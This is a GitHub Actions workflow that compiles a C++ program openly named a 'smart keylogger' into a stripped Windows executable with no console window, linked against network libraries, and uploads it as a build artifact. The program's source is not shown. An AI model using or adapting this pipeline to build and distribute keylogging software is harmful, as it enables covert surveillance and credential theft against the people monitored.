name: Build Smart Keylogger

on: [push, workflow_dispatch]

jobs:
  build-windows:
    runs-on: windows-latest
    
    steps:
    - uses: actions/checkout@v4
    
    - name: Set up MinGW
      uses: egor-tensin/setup-mingw@v2
      with:
        platform: x64
        version: 13.2.0-rt_v11-rev0
    
    - name: Build with MinGW
      run: |
        g++ -o smartkeylogger.exe main.cpp \
          -static -mwindows \
          -lwinhttp -luser32 -lshell32 -lole32 -lkernel32 \
          -lgdi32 -lcrypt32 -liphlpapi -lws2_32 -ladvapi32 \
          -lwininet -lcomdlg32 \
          -O2 -s -fpermissive
        
    - name: List files
      run: dir
        
    - name: Upload artifact
      uses: actions/upload-artifact@v4
      with:
        name: smartkeylogger
        path: smartkeylogger.exe
